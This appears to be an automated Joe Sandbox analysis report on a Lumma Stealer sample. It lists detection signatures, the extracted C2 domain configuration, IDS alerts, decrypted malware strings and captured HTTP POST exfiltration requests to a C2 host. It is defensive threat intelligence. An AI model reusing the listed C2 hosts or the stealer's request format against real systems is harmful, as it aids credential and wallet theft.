Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
oe9KS7ZHUc.exe

Overview

General Information

Sample name:oe9KS7ZHUc.exe
renamed because original name is a hash value
Original sample name:2de305ce45cdf39a8ad3c35979492cdd.exe
Analysis ID:1581630
MD5:2de305ce45cdf39a8ad3c35979492cdd
SHA1:584ace030f35030eb97a141b166abec0027ff90a
SHA256:2e8a71deb7a72c5c552a0c2c05baf20eda3750d6498d1f32771fb241673fc209
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • oe9KS7ZHUc.exe (PID: 7292 cmdline: "C:\Users\user\Desktop\oe9KS7ZHUc.exe" MD5: 2DE305CE45CDF39A8AD3C35979492CDD)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["rebuildeso.buzz", "scentniej.buzz", "prisonyfork.buzz", "hummskitnj.buzz", "mindhandru.buzz", "appliacnesot.buzz", "inherineau.buzz", "screwamusresz.buzz", "cashfuzysao.buzz"], "Build id": "LOGS11--LiveTraffic"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      Process Memory Space: oe9KS7ZHUc.exe PID: 7292JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: oe9KS7ZHUc.exe PID: 7292JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: oe9KS7ZHUc.exe PID: 7292JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-28T10:07:32.233644+010020283713Unknown Traffic192.168.2.44973123.55.153.106443TCP
              2024-12-28T10:07:34.787525+010020283713Unknown Traffic192.168.2.449732104.21.66.86443TCP
              2024-12-28T10:07:36.813500+010020283713Unknown Traffic192.168.2.449733104.21.66.86443TCP
              2024-12-28T10:07:39.370365+010020283713Unknown Traffic192.168.2.449734104.21.66.86443TCP
              2024-12-28T10:07:41.837134+010020283713Unknown Traffic192.168.2.449735104.21.66.86443TCP
              2024-12-28T10:07:44.232527+010020283713Unknown Traffic192.168.2.449736104.21.66.86443TCP
              2024-12-28T10:07:47.134711+010020283713Unknown Traffic192.168.2.449738104.21.66.86443TCP
              2024-12-28T10:07:50.846283+010020283713Unknown Traffic192.168.2.449742104.21.66.86443TCP
              2024-12-28T10:07:57.286230+010020283713Unknown Traffic192.168.2.449745104.21.66.86443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-28T10:07:35.521737+010020546531A Network Trojan was detected192.168.2.449732104.21.66.86443TCP
              2024-12-28T10:07:37.565195+010020546531A Network Trojan was detected192.168.2.449733104.21.66.86443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-28T10:07:35.521737+010020498361A Network Trojan was detected192.168.2.449732104.21.66.86443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-28T10:07:37.565195+010020498121A Network Trojan was detected192.168.2.449733104.21.66.86443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-28T10:07:30.214797+010020585721Domain Observed Used for C2 Detected192.168.2.4512161.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-28T10:07:30.368042+010020585761Domain Observed Used for C2 Detected192.168.2.4626601.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-28T10:07:30.551718+010020585781Domain Observed Used for C2 Detected192.168.2.4569751.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-28T10:07:29.897339+010020585801Domain Observed Used for C2 Detected192.168.2.4509151.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-28T10:07:29.314346+010020585821Domain Observed Used for C2 Detected192.168.2.4511301.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-28T10:07:29.467544+010020585841Domain Observed Used for C2 Detected192.168.2.4555131.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-28T10:07:29.612976+010020585861Domain Observed Used for C2 Detected192.168.2.4579371.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-28T10:07:29.756412+010020585881Domain Observed Used for C2 Detected192.168.2.4589681.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-28T10:07:30.038081+010020585901Domain Observed Used for C2 Detected192.168.2.4521981.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-28T10:07:49.048667+010020480941Malware Command and Control Activity Detected192.168.2.449738104.21.66.86443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-28T10:07:32.994262+010028586661Domain Observed Used for C2 Detected192.168.2.44973123.55.153.106443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: oe9KS7ZHUc.exeAvira: detected
              Source: https://lev-tolstoi.com/aAvira URL Cloud: Label: malware
              Source: https://lev-tolstoi.com/apilAvira URL Cloud: Label: malware
              Source: https://lev-tolstoi.com/erAvira URL Cloud: Label: malware
              Source: https://lev-tolstoi.com/E=Avira URL Cloud: Label: malware
              Source: https://lev-tolstoi.com/teAvira URL Cloud: Label: malware
              Source: https://lev-tolstoi.com/apisAvira URL Cloud: Label: malware
              Source: oe9KS7ZHUc.exe.7292.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["rebuildeso.buzz", "scentniej.buzz", "prisonyfork.buzz", "hummskitnj.buzz", "mindhandru.buzz", "appliacnesot.buzz", "inherineau.buzz", "screwamusresz.buzz", "cashfuzysao.buzz"], "Build id": "LOGS11--LiveTraffic"}
              Source: oe9KS7ZHUc.exeVirustotal: Detection: 54%Perma Link
              Source: oe9KS7ZHUc.exeReversingLabs: Detection: 52%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: oe9KS7ZHUc.exeJoe Sandbox ML: detected
              Source: 00000000.00000002.1978404736.00000000008D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: hummskitnj.buzz
              Source: 00000000.00000002.1978404736.00000000008D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: cashfuzysao.buzz
              Source: 00000000.00000002.1978404736.00000000008D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: appliacnesot.buzz
              Source: 00000000.00000002.1978404736.00000000008D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: screwamusresz.buzz
              Source: 00000000.00000002.1978404736.00000000008D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: inherineau.buzz
              Source: 00000000.00000002.1978404736.00000000008D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: scentniej.buzz
              Source: 00000000.00000002.1978404736.00000000008D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: rebuildeso.buzz
              Source: 00000000.00000002.1978404736.00000000008D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: prisonyfork.buzz
              Source: 00000000.00000002.1978404736.00000000008D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: mindhandru.buzz
              Source: 00000000.00000002.1978404736.00000000008D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.1978404736.00000000008D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.1978404736.00000000008D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.1978404736.00000000008D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.1978404736.00000000008D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.1978404736.00000000008D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: LOGS11--LiveTraffic
              Source: oe9KS7ZHUc.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49742 version: TLS 1.2

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2058586 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz) : 192.168.2.4:57937 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058572 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz) : 192.168.2.4:51216 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058588 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz) : 192.168.2.4:58968 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058590 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz) : 192.168.2.4:52198 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058580 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz) : 192.168.2.4:50915 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058582 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mindhandru .buzz) : 192.168.2.4:51130 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058584 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz) : 192.168.2.4:55513 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058578 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz) : 192.168.2.4:56975 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058576 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz) : 192.168.2.4:62660 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49732 -> 104.21.66.86:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.66.86:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49733 -> 104.21.66.86:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49733 -> 104.21.66.86:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49738 -> 104.21.66.86:443
              Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49731 -> 23.55.153.106:443
              Source: Malware configuration extractorURLs: rebuildeso.buzz
              Source: Malware configuration extractorURLs: scentniej.buzz
              Source: Malware configuration extractorURLs: prisonyfork.buzz
              Source: Malware configuration extractorURLs: hummskitnj.buzz
              Source: Malware configuration extractorURLs: mindhandru.buzz
              Source: Malware configuration extractorURLs: appliacnesot.buzz
              Source: Malware configuration extractorURLs: inherineau.buzz
              Source: Malware configuration extractorURLs: screwamusresz.buzz
              Source: Malware configuration extractorURLs: cashfuzysao.buzz
              Source: Joe Sandbox ViewIP Address: 104.21.66.86 104.21.66.86
              Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.66.86:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.66.86:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.66.86:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 23.55.153.106:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.66.86:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.66.86:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.66.86:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.66.86:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 104.21.66.86:443
              Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: lev-tolstoi.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=29JZWVK5YK3EFDIDVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18163Host: lev-tolstoi.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IPWSOXIXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8730Host: lev-tolstoi.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GBAF1YQJCBG0OP3BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20431Host: lev-tolstoi.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=U17H3DRUP7LQTD212PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1261Host: lev-tolstoi.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TJX8WT39OB66U6CGIPKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 571486Host: lev-tolstoi.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1738667408.0000000001478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=88434832a89f9e94d513ab5d; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35121Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSat, 28 Dec 2024 09:07:32 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1738667408.0000000001478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1738865391.0000000001483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=88434832a89f9e94d513ab5d; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35121Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSat, 28 Dec 2024 09:07:32 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
              Source: oe9KS7ZHUc.exe, 00000000.00000003.1737652932.00000000014BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: t https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: mindhandru.buzz
              Source: global trafficDNS traffic detected: DNS query: prisonyfork.buzz
              Source: global trafficDNS traffic detected: DNS query: rebuildeso.buzz
              Source: global trafficDNS traffic detected: DNS query: scentniej.buzz
              Source: global trafficDNS traffic detected: DNS query: inherineau.buzz
              Source: global trafficDNS traffic detected: DNS query: screwamusresz.buzz
              Source: global trafficDNS traffic detected: DNS query: appliacnesot.buzz
              Source: global trafficDNS traffic detected: DNS query: cashfuzysao.buzz
              Source: global trafficDNS traffic detected: DNS query: hummskitnj.buzz
              Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
              Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
